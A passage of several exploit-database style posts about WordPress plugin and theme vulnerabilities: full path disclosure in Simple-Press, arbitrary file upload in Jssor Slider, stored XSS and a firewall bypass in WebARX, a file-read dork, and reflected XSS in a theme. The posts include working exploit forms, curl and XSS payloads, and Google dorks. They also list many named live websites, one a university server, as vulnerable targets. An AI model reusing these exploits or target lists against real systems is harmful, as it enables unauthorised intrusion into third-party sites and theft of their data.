  15. ################################################################################################# # Exploit Title : WordPress Simple-Press Simple-Forum Editors and TinyMCE Plugin Full Path Disclosure Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 20/06/2018 # Vendor Homepages : simple-press.com/downloads/tinymce-editor-plugin/ - simplepressforum.com - northworks.ca - moxiecode.com + dsquaredmedia.co.uk - templatic.com - auvergne-rhone-alpes.developpement-durable.gouv.fr + cyberchimps.com/responsive-theme/ - wordpress.com/theme/mimbopro - uusiaalto.com - amesdesign.net # Tested On : Windows and Linux # Versions : WordPress 2.6 - 2.8 - 3.x - 4.2.2 # Category : WebApps # Exploit Risk : Medium # CWE : CWE-200 [ Information Exposure ] An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. + CWE-399 [ Resource Management Errors ] + CWE-211 [ Information Exposure Through Externally-Generated Error Message ] + CWE-532 [ Information Exposure Through Log Files ] + CWE-538 [ File and Directory Information Exposure ] + CWE-199 [ Information Management Errors ] ################################################################################################# # Description : Every forum needs a decent editor, and with TinyMCE you get just that. Provide your users with the same editor as you find in the WordPress admin panel to allow for an all round more familiar and user friendly posting experience. This editor can utilise two toolbars and also TinyMCE plugins, of which it comes pre supplied with all editing essentials such as ‘bold’, ‘blockquote’, ‘spoiler’, ‘link’, ‘image’ and more. Settings allow you all the control you should need including the essential option of rejecting posts with embedded formatting. # Screenshot 1 => simple-press.com/wp-content/uploads/edd/2015/04/tinymce-editor-1.png # Screenshot 2 => simple-press.com/wp-content/uploads/edd/2015/04/tinymce-editor-2.png # According to Owasp Security Portal, Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. # Risk Factor : The risks regarding FPD may produce various outcomes. For example, if the webroot is getting leaked, attackers may abuse the knowledge and use it in combination with file inclusion vulnerabilites to steal configuration files regarding the web application or the rest of the operating system. For Example : Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2 In combination with, say, unproteced use of the PHP function file_get_contents, the attacker gets an opportunity to steal configuration files. The sourcecode of index.php: <?php echo file_get_contents(getcwd().$_GET['page']); ?> An attacker crafts a URL like so: http://site.com/index.php?page=../../../../../../../home/example/public_html/includes/config.php with the knowledge of the FPD in combination with Relative Path Traversal <?php //Hidden configuration file containing database credentials. $hostname = 'localhost'; $username = 'root'; $password = 'owasp_fpd'; $database = 'example_site'; $connector = mysql_connect($hostname, $username, $password); mysql_select_db($database, $connector); ?> Disregarding the above sample, FPD can also be used to reveal the underlaying operation system by observing the file paths. Windows for instance always start with a drive-letter, e.g; C:\, while Unix based operating system tend to start with a single front slash. *NIX: Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/alice/public_html/includes/functions.php on line 2 Microsoft Windows: Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in C:\Users\bob\public_html\includes\functions.php on line 2 The FPD may reveal a lot more than people normally might suspect. The two examples above reveal usernames on the operating systems as well; "alice" and "bob". Usernames are of course important pieces of credentials. Attackers can use those in many different ways, ranging all from bruteforcing over various protocols (SSH, Telnet, RDP, FTP...) to launching exploits requiring working usernames. You can check here to full understand of the attack : owasp.org/index.php/Full_Path_Disclosure ################################################################################################# # Google Dorks : inurl:''/wp-content/plugins/simple-forum/editors/tinymce/'' intext:''proudly designed by dsquaredmedia.co.uk'' intext:''Website by NorthWorks'' intext:''Powered By WordPress | Voyage Theme'' intext:''Powered by WordPress & Mimbo Pro'' intext:''Web Site By dsixty'' intext:''© Mainostoimisto Underground Graphics 2012'' intext:''Grace Theme by Templatic" intext:''développé avec WordPress pour la DREAL Auvergne'' intext:''Site designed by amesDesign'' intext:''Responsive Theme powered by WordPress'' ################################################################################################# Full Path Disclosure Vulnerabilities => # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php Error : {"result":null,"id":null,"error":{"errstr":"Could not get raw post data.","errfile":"","errline":null,"errcontext":"","level":"FATAL"}} # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php Error : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_Logger has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php on line 21 # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php Error : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSONReader has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 26 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSON has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 362 # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php Error : Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 9 Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 15 # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SpellChecker has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php on line 9 # Exploit : /wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/sfa-framework.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-framework.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-framework.php on line 10 # Exploit : /wp-content/plugins/simple-forum/admin/sfa-notice.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-notice.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-notice.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php on line 11 # Exploit : /wp-content/plugins/simple-forum/sf-loader-admin.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/sf-loader-admin.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/sf-loader-admin.php on line 10 # Exploit : /wp-content/plugins/simple-forum/template-tags/sf-widgets.php Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; WP_Widget_SPF has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/template-tags/sf-widgets.php on line 15 Access Denied # Exploit : /wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php on line 10 # Exploit : /wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php on line 10 Exploit : /wp-content/plugins/simple-forum/help/documentation/database-script.sql Database: simple:press forum Version 4.2.2 Exploit : /wp-content/plugins/simple-forum/install/install-error.log Simple Forum İnstallation Log Files Exploit : /wp-content/plugins/simple-forum/install/sf-install.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-install.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-install.php on line 10 /wp-content/plugins/simple-forum/install/sf-upgrade.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-upgrade.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-upgrade.php on line 10 It gives same error : /wp-login.php?action=login&view=forum /wp-login.php?action=register&view=forum /wp-login.php?action=lostpassword&view=forum /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/css/filemanager-tm.css.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-browse-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-edit-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-folder-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-tinymce.js.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-upload-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/upload_file.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/upload_process.php Error : Your PHP installation appears to be missing the MySQL extension which is required by WordPress. Found Templates by SimpleForum => /wp-content/plugins/simple-forum/editors/tinymce/plugins/inlinepopups/template.htm ################################################################################################# # Example Site for Full Path Disclosure and SQL Injection Vulnerability => + University of Washington - Departments Web Server Information Technology WebSite is Vulnerable. Apache/2.2.32 (Unix) mod_ssl/2.2.32 OpenSSL/1.0.1e-fips mod_pubcookie/3.3.4a mod_uwa/3.2.1 Phusion_Passenger/3.0.11 Server at depts.washington.edu Port 80 depts.washington.edu/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php => [ Proof of Concept ] => archive.is/76tXR Errors displaying on the page : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_Logger has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php on line 21 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSONReader has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 26 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSON has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 362 Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 9 Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 15 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SpellChecker has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php on line 9 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 12 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 13 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 14 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 15 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 16 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 17 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 18 {"result":null,"id":null,"error":{"errstr":"Could not get raw post data.","errfile":"","errline":null,"errcontext":"","level":"FATAL"}} ################################################################################################# Source [ My Topic ] => cyberizm.org/cyberizm-wordpress-simplepress-simpleforum-editors-tinymce-vuln.html ################################################################################################# # Example Sites => depts.washington.edu/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php blogs.uprm.edu/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php americanclublyon.org/site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php ounasvaaranlatu.fi/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php alliancechristiancenter.org/development/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php churchoffrancisdesales.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php mudslingerevents.com/blog/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php preux-volley-ball.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php muenterprises.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php kjergaardsports.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php confemen.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php veda.com.ng/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php lisasee.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php soulographie.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php lunadanceinstitute.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php plaisance-port-leucate.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php shiatsu-angers.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php supremeroofing.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php automaxrecruitingandtraining.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php slulabservices.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
  16. ################################################################################################# # Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 19/06/2018 # Vendor Homepage : jssor.com - drcsystems.com - ethicsolutions.com - wordpress.org/plugins/jssor-slider/ # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-284 [ Improper Access Control ] - CWE-862 [ Missing Authorization ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060226 ##################################################################################################### Description : “Jssor Slider by jssor.com” is open source software. Jssor Slider is professional, light weight and easy to use slideshow/slider/gallery/carousel/banner, it is optimized for mobile device with tons of unique features. # Key Features : Touch Swipe - 200+ Slideshow Transitions - Layer Animation - Fast Loading, load slider html code from disk cache directly - High Performance Light Weight - Easy to Use - Repeated Layer Animation - Image Layer - Text/Html Layer - Panel Layer - Nested Layer - Layer Blending - Clip Mask Multiplex Transition - z-index Animation - Timeline Break - Dozens of bullet/arrow/thumbnail skins ##################################################################################################### Affected Jssor Slider Plugin Code : When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run: That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. The upload_library() function accessible through that handles uploading a file through /lib/upload.php. That file also doesn’t do any checks as to who is making the request and does not restrict what type of files can be uploaded. It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that isn’t treated as an error. The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/. Make sure to replace “[path to WordPress]” with the location of WordPress. public function register_ajax_calls() { if ( isset( $_REQUEST['action'] ) ) { switch ( $_REQUEST['action'] ) { case 'add_new_slider_library' : add_action( 'admin_init', 'jssor_slider_library' ); function jssor_slider_library() { include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php'; } break; case 'upload_library' : add_action( 'admin_init', 'upload_library' ); function upload_library() { include_once JSSOR_SLIDER_PATH . '/lib/upload.php'; } break; } } } ##################################################################################################### # Google Dorks : inurl:''/wp-content/jssor-slider/jssor-uploads/'' intext:''Managed by Web development company Ethic Solutions'' intext:''Todos los derechos reservados © Ecuaauto - Distribuidor autorizado Chevrolet Ecuador'' intext:''Website Developed by DRC Systems'' ##################################################################################################### # PoC : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library # Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"} # Exploit Code : <html> <body> <form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" > <input type="file" name="file" /> <input type="submit" value="Submit" /> </form> </body> </html # Uploaded File Path : /wp-content/jssor-slider/jssor-uploads/..... # Allowed File Extensions : With the exception of php and asp. [ Not Allowed ] But other files extensions are allowed. For example html and txt and etcetra.... # Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1] localhost/jssorsliderexploiter.html ################################################################################################# # Example All Vulnerable Sites => treeline.co/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library sss2003.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library lr-parts.com.ua/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library eduardobermejo.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library anro.net.pl/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library esplural.com/ecuaauto/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library sardardham.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library butterbean.ph/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library canoes.fr/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library betterimpact.ca/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library klshospital.co.in/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library ############################################################################ Reference [ Me ] : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  17. # Exploit Title: WordPress WebARX Website Firewall - Stored XSS and firewall bypass. # Type: WordPress Plugin # Date: 2018-09-27 # Exploit Author: ed0x21son # Vendor Homepage: https://www.webarxsecurity.com # Software Link: http://update.webarxsecurity.com/wp-update-server/?action=download&slug=webarx # Version: 1.3.0 # Category: WebApps, WordPress # Tested on: WordPress 4.9.8 [Vulnerabilities] #1: Unauthenticated stored XSS: curl -I -H 'X-Forwarded-For: <script>alert("U-H4V3-B33N-PWN3D")</script>' 'http://localhost/?xss=<script>alert(/pwn3d/)</script>' Go to Wordpress dashboard and view WebARX logs: pwnd! #2: Firewall bypass: U can bypass all firewall security and rules if u add "cc=1" to the Post or Get payload. Blocked by firewall: curl 'http://localhost/?xss=<script>alert(/pwn3d/)</script>' Not blocked by firewall: curl 'http://localhost/?xss=<script>alert(/pwn3d/)</script>&cc=1'
  18. *************************************************** # Exploit Title: Wordpress Wp-license Vulnerability # Google Dork: "inurl:wp-license.php?file=" # Date: 21/09/2018 # Author: Rednofozi # Vendor Homepage : www.wordpress.com # Team: https://anonysec.org # Tested on: Ubuntu 16.04 ***************************************************************| |[+] Exploit : | |[+] | |[+] Poc : | | Search dork in google | | exploit:localhost/wp-license.php?file=/ | |--------------------------------------------------------------| |[+] Demo:- | |[+] http://enviromark.com/wp-license.php?file= | |[+] | |[+] | |[+] | |--------------------------------------------------------------| *************************************************** Discovered by : Rednofozi Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2040
  19. [+] Title :- Wordpress Contentive Theme - Cross Site Web Vulnerability [+] Date :- 2018-09-13 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- N/A [+] Team name :- Anonysec.org [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= Common Vulnerability Scoring System: ==================================== 3.2 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A stored cross site scripting web vulnerability has been discovered in the official Wordpress Contentive Theme web-application. The non-persistent vulnerability allows remote attackers to inject own malicious script code to client-side application to browser requests. The client-side cross site vulnerability is located in the `label` value of the page module GET method request. Remote attackers are able to inject own malicious script codes to the client-side of the online service web-application to compromise user session information or data. The security risk of the cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2. Exploitation of the cross site vulnerability requires no privileged web-application user account and low user interaction. Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent manipulation of affected and connected module context. Request Method(s): [+] GET Vulnerable Service(s): [+] Contentive Theme (Wordpress) Vulnerable Module(s): [+] Input Vulnerable Parameter(s): [+] label Proof of Concept (PoC): ======================= The remote cross site vulnerability can be exploited by remote attackers privileged web-application user accounts with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Example http://wp.localhost:8080/?s=[CLIENT SIDE CROSS SITE SCRIPTING VULNERABILITY!] PoC: Exploitation http://wp.localhost:8080/?s="'/><svg/onload=alert(/31337/);> PoC: Vulnerable Source <form role="search" method="get" id="searchform" action="http://wp.localhost:8080"> <div> <input type="text" value=""'/><svg/onload=alert(123);>" name="s" id="s"/> <input type="submit" id="searchsubmit" value=""/> </div> </form> Reference(s): http://wp.localhost:8080/?s= Solution - Fix & Patch: ======================= The vulnerability can be patched by a parse and encode of the vulnerable `label` value in the webpage GET method request. Encode the parameter and restrict the value input to prevent further script code injection attacks. Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2033
